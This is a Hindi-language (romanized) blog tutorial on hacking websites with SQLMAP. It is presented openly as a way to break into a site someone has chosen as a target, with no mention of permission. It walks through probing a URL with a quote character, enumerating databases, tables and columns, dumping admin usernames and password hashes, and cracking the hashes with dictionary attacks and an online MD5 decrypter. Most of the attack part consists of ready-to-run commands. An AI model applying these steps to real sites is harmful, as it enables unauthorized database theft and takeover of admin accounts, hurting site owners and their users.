Website Kaise Hack Kre Or Oska Data Kaise Nikale SQLMAP Ki Madad Se Full Tutorier In-Hindi

SQLMAP KYA HAI  KAISE KAM KARTA HAI

SQLMAP ek open source penetration testing tool hai jo ki kisi v website ke database ko automatic detact karleta or hame oska information de sakta hai ek tarah se kaha jaye to isko sirf testing ke liye banaya gya tha ki agar aapke website ki database me koi gadbadi payi jati hai to aap iski madad se oske error ka pata laga sakte hai magar hackers iska galat use karte hai or iska use hacking ke liye karte hai to aap ye to samjh h gaye honge ki SQLMAP kya hai or iska kam kya hai or ab ham niche janege ki  kaise hum iska istemal website hacking ke liye kar sakte hai



NOTE: SQLMAP  Kali linux me pahle se install rahta hai isko aap command deke chalu kar sakte hai .




STEP 1. sabse pahle hamko ye pata karna padega ki jis website ko ham hack karne ja rahe hai wo vulnerable website hai ki nahi iske liye hamare pass ek bahut h simple sa trick hai aap koi v ek website ka ulr ko apne kisi v browser me open kijiye ab aapka url kuch iss tarh ka hoga http://www.targetwebsite.com/form.php?id=5  ab aapko karna kya hai ki aapko url ke last me ye mark lagana hai (') is mark ko single quotation mark bolte hai ab aapka url kuch iss tarah ka dikh raha hoga http://www.targetwebsite.com/form.php?id=5'ab aap niche picture me dekhe error dikha raha hai iss error ka matlab hai ki wo website vulnerable hai jisko ham inject kar sakte hai .

Ab ham janege ki kaise ham SQLMAP ki madad se kisi website ke databse ko over-take kar sakte hai



STEP 2. Ab aapko vulnerable mil gya hai ab aap apna terminal ko open karle or niche diye gaye command ko type kare .

root@seven:~# sqlmap -h<br />Usage: python sqlmap [options]<br />Options:<br /> -h, --help Show basic help message and exit<br /> -hh Show advanced help message and exit<br /> --version Show program's version number and exit<br /> -v VERBOSE Verbosity level: 0-6 (default 1)<br />Target:<br /> At least one of these options has to be provided to define the<br /> target(s)<br /> -u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")<br /> -g GOOGLEDORK Process Google dork results as target URLs<br /> Request:<br /> These options can be used to specify how to connect to the target URL<br /> --data=DATA Data string to be sent through POST<br /> --cookie=COOKIE HTTP Cookie header value<br /> --random-agent Use randomly selected HTTP User-Agent header value<br /> --proxy=PROXY Use a proxy to connect to the target URL<br /> --tor Use Tor anonymity network<br /> --check-tor Check to see if Tor is used properly<br /> Injection:<br /> These options can be used to specify which parameters to test for,<br /> provide custom injection payloads and optional tampering scripts<br /> -p TESTPARAMETER Testable parameter(s)<br /> --dbms=DBMS Force back-end DBMS to this value<br /> -a, --all Retrieve everything<br />

STEP 3. Sabse pahle hame ye dekhna hai ki website pe sara datbase moajud hai ki nahi iske liye iss Syntax ka use kare

Syntax: sqlmap -u [URL] --dbs

-u: ye command ham iss liye dete hai taki oparating system ko pata chal sake ki ham koi url dalne wale hai

--dbs: ye command Deke ham oss website ka pura data jo oske andar moajud hai oska pata lagate hai.



Complete command: ye aapka pura command hoga yaha pe code ko change karke apna target url dal de or iss command ko aapko type karna hai.

root@seven:~# sqlmap -u www.yourtarget.com/index.php?id=31 --dbs

STEP 4. ab aap picture me dekhiye ye jab likhega back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes ?  to aapko y button badakar skip kardena or oske next me v aapko y button badana hai .

bas ab proccess chalega iske liye aapko kuch minute wait karne padenge jab ye successfull completion ho jayega tab ye aapko sari list dikha dega jo website ke andar database moajud hogi.

STEP 5. Ab yaha pe picture me do database dikha raha hai pahla information schema or dusra guru ab in dono ka matlab kya hai information schema ek standrad database hai jo ki har MYSQL database me rahta hai iska matlab ye hamare kisi kam ka nahi hai hamara main database guru ke andar hai ab hame guru ko exploit karna hai.

GURU DATABASE KO KAISE EXTRACT KARE

STEP 6. Iske liye hame do parameters dene honge jo ki niche aap dekh sakte hai .

sqlmap -u [URL] -D Database_name --tables

1. -D : d ka matlab database hame jis database ko extract karna hai ham oss database ka nam denge yaha.

2. --tables : iska matlab hai ki ham jis database ka nam de rahe hai osko extract kardo .


Complete Command: ye aapka pura command hai isme apna website ka nam bas change karde or fir type karke enter krde.

root@seven:~# root@seven:~# sqlmap -u http://targetwebsite.com/product_detail.php?ID=41 -D guru --tables

aap iss code ko edit karke website ka nam dal de jo aapne target kiya hua hai

STEP 7. ab jaisa ki aap picture me dekh rahe hai hame tables ke form me database dikh raha hai but hame admin user wala data chahiye kyoki admin ka database mil gya to website
me sab kuch aasani se hack kar sakte hai .

Extract columns

ab hamko admin user wale databse ko extract karna hai iske liye hame command dena padega jisko ham niche explanation ke sath bataye hai

-D :  D option database ke liye hota hai jisme admin user ki information hai .


-T : T matlab Table hota hai admin table ke liye ham iska use karte hai .

--columns : table ke anadr jo coloumn moajud h jinko extract karna hai oske liye ham coloumns ka use karte hai.


Complete command: iss command me se bas website ko edit krde or apna website dalke enter karde.

root@seven:~# sqlmap -u http://target.com/product_detail.php?ID=41 -D guru -T AdminUser --columns

STEP 8. Jab ye finish hojayega tab ye display pe sara columns dikha dega jo table ke andar moajud hai jisko aap picture me v dekh sakte hai ab aap yaha pe bahut sara column dekh sakte hai jaise ki username , passwords , emails , addresshes , and many more ab hame jisko access chalo mai user_ coloum ko pahle access kar rhe hai ham username stored ko jo colomn ke andar hai osko extract karne ke liye command dete hai .



-D :     database ko access karne ke liye iss command ka use karte hai.

-T :   Table ko access karne ke liye iss command ka use karte hai.

-C :   column ko access karne ke liye iss command ka use karte hai .

--dump :    iss command se ham coloumn ke andar ka data nikal sakte hai.


Full command: ab ye pura command hai isme website address ko edit krke enter krle.

root@seven:~# sqlmap -u http://target.com/product_detail.php?ID=41 -D guru -T AdminUser -C USR_Username --dump

STEP 9. jaisa ki picture me dikh raha hai hame yaha pe do admin ka account dikh raha hai iska matlab  hame admin user ki information mil gyi.

maine jo website dala hai ospe sirf do admin hai agar aapka terminal jyada time lerha hai information nikalne me to mai aapko --threads 7 commad derha hu ye command fast loading hai ye hamako fast data loading me help karti hai.

root@seven:~# sqlmap -u http://target.com/product_detail.php?ID=41 -D guru -T AdminUser -C USR_Username --dump --threads 7

STEP 10. ab hame password ki jarurat hai isme kuch khass dhyan nhi dena hai aapko bas command ko ache se dhyan se dekhna hai password ke liye ham bas username ki jagah password dal diya hai bas hogya password ke liye command niche se command copy karke type karde.

root@seven:~# sqlmap -u http://target.com/product_detail.php?ID=41 -D guru -T AdminUser -C USR_Password --dump

STEP 11. Ab aap picture me dekh sakte hai jiska matlab aap samjh h gye honge ye bol raha hai ki password yaha pe moajood nhi hai isko hame crack karna padega jab aap command me dekhenge to ye puch raha hoga ki kya aap dictionary-based se attack karna chahte hai to y enter kijiye bas aap y daba kar enter pe click karde.

STEP 12. Ab yaha next step me ye puchega ki aap dictionary ko kaha se use karna chahte hai ham 1 ko pahle select karenge oske baad ye password crack karna start kardega adhiktar default dictionary file se hashes paswword crack nhi kar pata hai but fir v ham test karenge.

STEP 13. hame yaha pe password nahi mila hai to koi bat nhi hamare pass or v alternatives hai internet pe bahut sare online md5 decrypters hai jo password crack karne ke kam me aata hai .

STEP 14. yaha pe aap apne hashes ko note karle ham yaha pe hashkiller ka use krke hash website ko crack karenge.

STEP 15. Ab yaha pe aapko hashkiller ke website pe jana hoga apne hash ko crack karne ke liye waha pe jake right side me apna url past karde or fill captcha ko fill krke submit pe click karde ab jo cracked hash hoga wo hash ke right side me show hoga jaisa ki aap picture me dekh sakte hai maine apna hash cracked karliya hai

NOW-POST-IS-COMPLETED-HERE-IS-SOME-FEEDBACK

Aap chahe to costom dictionary ko internet se download karke v use kar sakte hai agar aapko iss post se related kisi step me problem aarahi hai to mujhe aap comment karke bataye ham osko solve karenge ummid hai aaj ka yah post aap logo ko pasand aaya hoga thank you for visiting our site keep visitng us